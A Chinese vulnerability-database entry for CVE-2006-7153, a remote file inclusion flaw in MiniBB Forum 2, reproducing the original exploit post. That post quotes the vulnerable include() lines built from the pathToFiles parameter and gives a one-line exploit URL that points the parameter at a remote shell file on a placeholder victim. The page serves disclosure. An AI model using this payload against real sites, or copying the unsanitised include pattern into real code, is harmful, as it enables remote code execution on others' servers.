MiniBB Forum index.php 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191389 漏洞类型 未知
发布时间 2007-03-07 更新时间 2007-03-07
CVE编号 CVE-2006-7153 CNNVD-ID CNNVD-200703-263
漏洞平台 N/A CVSS评分 10.0
|漏洞来源
https://www.securityfocus.com/bid/83574
https://cxsecurity.com/issue/WLB-2007030069
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-263
|漏洞详情
MiniBBForum2版本的index.php中存在PHP远程文件包含漏洞。远程攻击者可以借助pathToFiles参数中的一个URL,执行任意代码。
|漏洞EXP
Title : MiniBB Forum <= 2 Remote File Include (index.php)
########################################################################

#######

Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}

------------------------------------------------------------------------

Sorce Code:
http://www.minibb.net/download.php?file=minibb20
-----

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : MiniBB Forum 2 (index.php)version :
version [ 2 ]
exploit :Remote File Include
------------------------------------------------------------------------

-----
Vulnerable Code:
include ($pathToFiles.'setup_'.$DB.'.php');
include ($pathToFiles.'bb_cookie.php');
include ($pathToFiles.'bb_functions.php');
include ($pathToFiles.'bb_specials.php');
----------------------------------------------------------------------
Exploit:
http://www.VicTim.com/[Script_Path]/index.php?pathToFiles=Shell.txt?

------------------------------------------------------------------------

----

greetz: Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco

Special Greeting:AsbMay's Group

channel:www.asb-may.net

contact:spoonman500[at]hotmail[dot]com

_________________________________________________________________
MSN Hotmail sur i-mode? : envoyez et recevez des e-mails depuis votre 
tlphone portable ! http://www.msn.fr/hotmailimode/
|受影响的产品
MiniBB Forum 2
|参考资料

来源:XF
名称:minibb-index-file-include(30253)
链接:http://xforce.iss.net/xforce/xfdb/30253
来源:BUGTRAQ
名称:20061113NewBugMiniBBForum<=2RemoteFileInclude(index.php)
链接:http://www.securityfocus.com/archive/1/archive/1/451402/100/0/threaded
来源:SREASON
名称:2371
链接:http://securityreason.com/securityalert/2371